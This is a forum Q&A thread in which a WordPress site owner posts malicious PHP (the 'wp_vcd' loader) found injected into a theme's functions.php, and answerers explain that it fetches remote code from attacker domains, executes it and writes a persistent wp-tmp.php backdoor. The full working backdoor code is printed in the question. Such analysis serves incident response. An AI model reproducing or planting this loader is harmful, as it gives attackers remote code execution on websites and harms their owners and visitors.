# What does this code do? (Injected code hacked)

Tags: functions, hacked, hacks

This code below was been injected in my wordpress theme on functions.php
Can someone explain me what does the code do? how that was been done?

```
$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }

        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            if( fwrite($handle, "<?php\n" . $phpCode))
            {
            }
            else
            {
                $tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }


        $wp_auth_key='7af507a87318d795efbdb0a3a9028aad';
        if (($tmpcontent = @file_get_contents("http://www.linos.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.linos.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }

            }
        }


    elseif ($tmpcontent = @file_get_contents("http://www.linos.me/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

        if (stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
            @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);

            if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                    @file_put_contents('wp-tmp.php', $tmpcontent);
                }
            }

        }
    } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent));

    } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent)); 

    } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent)); 

    } elseif (($tmpcontent = @file_get_contents("http://www.linos.xyz/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.linos.xyz/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
        extract(theme_temp_setup($tmpcontent)); 

    }





}
}
```

Answer (score 5, accepted):

It gets code from a remote location (http://www.linos.cc/code.php) and stores it within a temporary file using `sys_get_temp_dir()` - http://php.net/manual/en/function.sys-get-temp-dir.php - and then creates a `wp-tmp.php` file with the before-mentioned code within your WordPress installation in the following locations:

`/wp-includes/wp-tmp.php`

and

`/wp-content/themes/your-theme-name/wp-tmp.php`

The code that's stored in this file (http://www.linos.cc/code.php) appears to append content to your WordPress sites pages using the `the_content` WordPress filter - https://codex.wordpress.org/Plugin_API/Filter_Reference/the_content.

Ps. The domain name linos.cc is registered with NameCheap - https://www.namecheap.com/ - so you could always report the domain to them as being used for abuse/malicious purposes. You can view details of the domain and get the domain registrars abuse reporting email here: http://whois.domaintools.com/linos.cc

Answer (score 1):

Hard to say with specifics 'how' the code got there. But I'd guess a security vulnerability in your theme, or a plugin.

In any case, it will add content to your page - spammy links, or perhaps even try to run code on the visitor's system. (As @mat mentioned in his answer.)

So, you need to get rid of it. Lots of googles on how to 'un-hack' a site. It takes some effort, but can be done, IMHO. I even wrote a process on how to do it, based on my experiences cleaning up a site: http://securitydawg.com/recovering-from-a-hacked-wordpress-site/ .